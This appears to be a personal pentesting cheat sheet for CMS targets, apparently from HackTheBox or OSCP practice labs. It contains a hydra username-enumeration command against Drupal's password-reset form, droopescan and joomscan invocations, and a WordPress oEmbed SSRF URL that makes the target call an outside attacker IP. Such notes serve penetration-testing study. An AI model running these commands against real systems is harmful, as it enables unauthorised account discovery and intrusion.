# CMS
### BigTree
check oscp demo alpha
### Drupal
* https://hacktricks.boitatech.com.br/pentesting/pentesting-web/drupal
--- user enumeration
hydra 10.129.214.154 http-post-form "/user/password:name=^USER^&form_build_id=form-q2OtblVzGPwpntpRLcpH0irZhuK72SVAinIVwJjNAWU&form_id=user_pass&op=E-mail+new+password:is not recognized" -L /opt/SecLists/Usernames/top-usernames-shortlist.txt -e 'n'

--- user enumeration 
/user/<number> -> 403 == user exists -> 404 == no user

--- page enumeration
/node/<page number>

--- droopescan 
`droopescan scan drupal -u 10.10.10.102:80`
--- drupalgeddon
### Joomla
joomscan -ec -u  http://curling.htb
### Wordpress
--- wpscan
* SSRF
http://10.10.110.100:65000/wordpress/index.php/wp-json/oembed/1.0/proxy?url=http://10.10.14.210

* https://hacktricks.boitatech.com.br/pentesting/pentesting-web/wordpress
